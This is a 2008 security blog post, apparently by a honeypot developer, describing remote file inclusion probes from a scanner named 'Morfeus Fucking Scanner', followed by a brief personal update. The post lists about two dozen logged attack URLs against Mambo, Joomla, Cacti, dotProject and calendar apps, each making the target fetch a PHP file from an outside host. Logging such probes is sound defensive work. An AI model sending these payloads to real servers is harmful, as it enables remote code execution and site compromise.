Virus Blog

Morfeus Fucking Scanner

— Posted by zeroq @ 12:00 - 20 Aug, 2008

I am currently playing around with a webserver emulation modul for Amun, to catch remote file inclusion attacks on certain webapplications. thus i stumbled across the user-agent: Morfeus Fucking Scanner. it seems to be a software which scans webservers for vulnerable services, like mambo or cacti. following urls were tried at our honeypots:

/admin/business_inc/saveserver.php?thisdir=http://203.206.169.35/1.gif?/
/admin/business_inc/saveserver.php?thisdir=http://makina.org/sugarfree/1.gif?/
/board/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/board/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/cacti/include/config_settings.php?config[include_path]=http://makina.org/sugarfree/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/
/cal/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://makina.org/sugarfree/1.gif?/
/ical/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://makina.org/sugarfree/1.gif?/
/index.php?id=http://makina.org/sugarfree/1.gif?/
/index.php?option=com_custompages&cpage=http://203.206.169.35/1.gif?/
/joomla/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
//?mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/project/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/projects/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/user/soapCaller.bs
/webcalendar/tools/send_reminders.php?includedir=http://makina.org/sugarfree/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/

the file 1.gif which the attacker wants to include all the time, is a simple PHP script, just echoing some wise text:

echo ("Morfeus hacked you");

no need to get excited, though =)



Still Alive

— Posted by zeroq @ 09:11 - 11 Aug, 2008
jep i am still alive. i moved from aachen to mannheim, thus, i didn't have much time for writing. the next release of amun is almost ready, this time with little things that changed, but thanx to lukas from glasblog and the guy(s) behind joebox security a new submission module for the joebox. Furthermore i had to adjust the submit-cwsandbox module as the result URL seems to have changed a bit.

Powered by kulando